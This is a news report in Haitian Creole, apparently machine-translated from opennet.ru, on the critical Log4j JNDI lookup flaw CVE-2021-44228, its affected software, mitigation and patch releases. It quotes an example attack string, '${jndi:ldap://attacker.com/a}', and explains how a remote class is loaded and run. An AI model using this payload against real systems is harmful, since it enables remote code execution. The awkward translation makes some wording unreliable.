Nan Apache Log4j, yon fondasyon popilè pou òganize antre nan aplikasyon Java, yo te idantifye yon vilnerabilite kritik ki pèmèt kòd abitrè yo dwe egzekite lè yo ekri yon valè fòma espesyal nan fòma "{jndi:URL}" nan boutèy la. Atak la ka fèt sou aplikasyon Java ki anrejistre valè yo resevwa nan sous ekstèn, pou egzanp, lè yo montre valè pwoblèm nan mesaj erè.
Li te note ke prèske tout pwojè ki sèvi ak kad tankou Apache Struts, Apache Solr, Apache Druid oswa Apache Flink yo afekte pa pwoblèm nan, ki gen ladan vapè, Apple iCloud, kliyan Minecraft ak serveurs. Li espere ke vilnerabilite a ta ka mennen nan yon vag nan atak masiv sou aplikasyon antrepriz, repete istwa a nan frajilite kritik nan fondasyon Apache Struts, ki, dapre yon estimasyon ki graj, yo itilize nan aplikasyon entènèt pa 65% nan Fortune. Konpayi 100. Ki gen ladan tantativ pou eskane rezo a pou sistèm vilnerab yo.
Pwoblèm nan agrave pa lefèt ke yon eksplwatasyon k ap travay te deja pibliye, men fikse pou branch ki estab yo poko konpile. Idantifyan CVE yo poko bay. Se ranje a sèlman enkli nan branch tès la log4j-2.15.0-rc1. Kòm yon solisyon pou bloke vilnerabilite a, li rekòmande pou mete paramèt log4j2.formatMsgNoLookups a vre.
Pwoblèm nan te koze pa lefèt ke log4j sipòte tretman mask espesyal "{}" nan pwodiksyon liy nan boutèy demi lit la, nan ki JNDI (Java Naming and Directory Interface) demann yo ka egzekite. Atak la se pase yon fisèl ak sibstitisyon an "${jndi:ldap://attacker.com/a}", lè yo fin trete ki log4j pral voye yon demann LDAP pou chemen an nan klas Java nan sèvè attacker.com. . Chemen sèvè atakè a retounen (pa egzanp, http://second-stage.attacker.com/Exploit.class) ap chaje ak egzekite nan yon kontèks pwosesis aktyèl la, ki pèmèt atakè a egzekite kòd abitrè sou la. sistèm ak dwa aplikasyon aktyèl la.
Addendum 1: Yo bay vilnerabilite a idantifyan CVE-2021-44228.
Addendum 2: Yo idantifye yon fason pou kontoune pwoteksyon ki te ajoute pa lage log4j-2.15.0-rc1. Yon nouvo aktyalizasyon, log4j-2.15.0-rc2, yo te pwopoze ak plis pwoteksyon konplè kont vilnerabilite a. Kòd la mete aksan sou chanjman ki asosye ak absans yon revokasyon nòmal nan ka itilize yon URL JNDI ki mal fòma.
Sous: opennet.ru